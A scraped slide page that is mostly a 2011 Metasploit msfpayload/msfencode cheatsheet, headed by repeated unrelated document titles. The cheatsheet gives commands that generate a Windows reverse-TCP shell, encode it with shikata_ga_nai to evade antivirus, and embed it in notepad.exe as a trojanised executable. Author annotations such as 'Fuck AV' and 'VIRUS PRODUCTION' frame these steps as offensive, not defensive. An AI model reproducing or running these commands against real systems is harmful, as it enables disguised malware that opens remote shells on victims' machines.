The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 

Msfpayload/Msfencoder cheatsheet

  • 1. ========================================= A LITTLE MSFPAYLOAD/MSFENCODER CHEATSHEET ========================================= Last Modify: 08/12/2011 Author: luca.mella@studio.unibo.it ****************************************************************************** msfpayload -l List all payloads avaible msfpayload windows/shell/reverse_tcp S Print the summary of payload ------------------------------------------------------------------------ Name: Windows Command Shell, Reverse TCP Stager Module: payload/windows/shell/reverse_tcp Version: 10394, 11421 Platform: Windows Arch: x86 Needs Admin: No Total size: 290 Rank: Normal Provided by: spoonm <spoonm@no$email.com> sf <stephen_fewer@harmonysecurity.com> hdm <hdm@metasploit.com> skape <mmiller@hick.org> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to the attacker, Spawn a piped command shell (staged) ------------------------------------------------------------------------ msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 x > program.exe ****************************************************************************** msfencode OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: 'x00xff' !!! FTW !!! -c <opt> The number of times to encode the data !!! Fuck AV !!! -d <opt> Specify the directory in which to look for EXE templates -e <opt> The encoder to use -h Help banner
  • 2. -i <opt> Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file -p <opt> The platform to encode for -s <opt> The maximum size of the encoded data -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop- vbs,asp,war -v Increase verbosity -x <opt> Specify an alternate executable template !!! VIRUS PRODUCTION !!! SUPPORTED ENCODERS: Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
  • 3. EXAMPLES: msfencode -e x86/alpha_mixed msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 R | msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe EXPLOIT SESSION HANDLER: msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=127.0.0.1 E